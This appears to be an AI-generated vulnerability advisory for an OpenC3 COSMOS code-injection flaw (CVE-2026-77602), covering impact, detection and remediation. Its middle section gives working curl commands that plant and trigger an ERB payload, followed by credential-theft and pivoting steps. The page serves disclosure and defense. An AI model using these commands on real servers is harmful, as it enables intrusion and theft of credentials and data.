
PEACH
Un cadre d’isolation des locataires
CVE-2026-77602 is a critical authenticated remote code execution vulnerability in OpenC3 COSMOS, a command and control framework for embedded systems. It affects versions 5.1.0 through 7.2.1 (inclusive), and was published on September 23, 2026 with a fix released in version 7.3.0. The root cause is that the user-writable targets_modified/ configuration overlay is processed as executable code by multiple subsystems, allowing any authenticated non-administrator user to achieve arbitrary code execution on the server. It carries a CVSS v3.1 base score of 9.9 (Critical) (Github Advisory, OpenC3 Advisory).
The vulnerability is classified as CWE-94 (Improper Control of Generation of Code / Code Injection). The root cause is that TargetFile.body() reads from the user-writable {scope}/targets_modified/{name} path before the read-only {scope}/targets/{name} tree, and three distinct code-execution sinks process these files without privilege gating: (1) ERB rendering — ConfigParser#parse_file runs ERB.new(File.read(filename)).result() by default (run_erb=true) on table and cmd/tlm definitions; (2) GENERIC conversion eval — GenericConversion#call executes eval(@code_to_eval) in Ruby or compile()/exec()/eval() in Python on GENERIC_READ_CONVERSION_START/GENERIC_WRITE_CONVERSION_START blocks; (3) Suite require — run_suite_analysis.rb executes require ARGV[1] on procedure files. Non-admin users can write to targets_modified/ via the screen-save endpoint (screens_controller.rb create, requiring only system_set) or the storage-upload presigned endpoint (which exempted targets_modified/ from its admin check), and trigger execution via table actions (system tier) or suite analysis (script_view tier) — both below the admin/script_run tiers where COSMOS normally gates code execution. In the open-source edition, authorize ignores the permission string and checks only token validity, meaning any authenticated user qualifies (OpenC3 Advisory, Fix PR).
Successful exploitation grants arbitrary code execution as the openc3 user (uid=1001) within the cmd-tlm-api container, per-target decom microservices, and the Script Runner process. These microservices hold Redis credentials, object storage (bucket) credentials, and sit on the internal service network, giving an attacker full read/write access to COSMOS configuration, telemetry, and command data across all scopes. The scope change (S:C in CVSS) reflects that a low-privilege user can compromise privileged microservice containers, enabling lateral movement to internal infrastructure. In multi-user deployments where the API port is exposed over the network, this is fully remotely exploitable; in default single-host installs, the API is bound to 127.0.0.1:2900 via Traefik, limiting exposure to local access (OpenC3 Advisory).
A detailed proof-of-concept exploit using curl commands is publicly available in the GitHub security advisory, confirmed end-to-end against a booted Rails/puma instance (OpenC3 Advisory). The exploit requires only a valid authenticated session (any non-admin user in the open-source edition) and network access to the COSMOS API endpoint. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.574% (45th percentile), and NVD SSVC classifies exploitation status as 'poc' with technical impact 'total' (Github Advisory). No threat actor attribution has been reported.
BASE=http://localhost:2900/openc3-api
TOKEN=$(curl -s -X POST "$BASE/auth/verify" -H 'Content-Type: application/json' -d '{"password":"<password>"}')targets_modified/: Use the screen-save endpoint (requires only system_set, or any authenticated user in the open-source edition) to store an ERB payload verbatim in the overlay:curl -s -X POST "$BASE/screen" -H "Authorization: $TOKEN" \
--data-urlencode 'scope=DEFAULT' --data-urlencode 'target=INST' --data-urlencode 'screen=poc' \
--data-urlencode $'text=SCREEN AUTO AUTO 1.0\n<%= File.write("/tmp/erb_rce_poc", `id`) %>\nLABEL poc'Alternatively, use the storage-upload presigned endpoint to write a GENERIC conversion block or a suite procedure file to targets_modified/<TARGET>/cmd_tlm/ or targets_modified/<TARGET>/procedures/.
cmd-tlm-api container:curl -s -X POST "$BASE/tables/generate" -H "Authorization: $TOKEN" \
--data-urlencode 'scope=DEFAULT' --data-urlencode 'definition=INST/screens/poc.txt'The request returns HTTP 500 (invalid table keywords), but the ERB payload has already executed.
cmd-tlm-api container, confirm RCE:cat /tmp/erb_rce_poc
# Output: uid=1001(openc3) ...openc3 user, extract Redis credentials and bucket credentials from the container environment, then pivot to internal services or exfiltrate telemetry and command data across all COSMOS scopes (OpenC3 Advisory)./openc3-api/screen with text parameters containing ERB template syntax (e.g., <%=, %>) or shell backtick expressions; POST requests to /openc3-api/tables/generate or /openc3-api/tables/report referencing paths under screens/ or non-standard definition paths; presigned upload requests targeting targets_modified/<TARGET>/cmd_tlm/ or targets_modified/<TARGET>/procedures/ from non-admin users.targets_modified/<TARGET>/screens/, targets_modified/<TARGET>/cmd_tlm/, or targets_modified/<TARGET>/procedures/ containing ERB tags, GENERIC_WRITE_CONVERSION_START/GENERIC_READ_CONVERSION_START blocks with shell commands, or Ruby require-compatible suite files with malicious top-level code; marker files in /tmp/ created by the openc3 user (e.g., /tmp/erb_rce_poc).tables/generate or tables/report immediately after a POST /screen or storage upload from the same authenticated session; ERB evaluation errors or unexpected Ruby/Python eval exceptions in cmd-tlm-api or decom microservice logs.cmd-tlm-api, decom, or script-runner Java/Ruby processes (e.g., /bin/sh, curl, wget, python) running as uid=1001(openc3); unusual outbound network connections from COSMOS microservice containers to external IPs (OpenC3 Advisory).The primary remediation is to upgrade OpenC3 COSMOS to version 7.3.0 or later, which treats the targets_modified/ overlay as data rather than code by disabling ERB rendering at runtime (run_erb=false in PacketConfig, TableConfig), restricting cmd_tlm overlay writes to admin users only, and gating suite analysis execution at the script_run permission tier (Fix PR, Github Advisory). If immediate upgrade is not possible, restrict non-administrator user permissions to prevent creation or modification of files in targets_modified/, disable or restrict access to the screen-save and storage-upload endpoints for non-admin users, and avoid exposing the COSMOS API port (2900) to untrusted networks. Additionally, monitor and audit all configuration changes and file uploads in the COSMOS environment, and implement network segmentation to limit lateral movement from compromised COSMOS containers to internal credential stores.
The vulnerability was credited to researcher Marnick39 and published by OpenC3 maintainer jmthomas on September 3, 2026, with the GitHub Advisory Database entry published September 23, 2026 (Github Advisory). The fix PR discussion shows that the initial remediation approach (read-path gating) was rejected by maintainer ryanmelt in favor of a more comprehensive solution: removing ERB rendering entirely from runtime config parsing and restricting it to plugin install time only (Fix PR). No significant broader media coverage or social media discussion has been identified beyond the GitHub advisory and automated CVE tracking services.
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."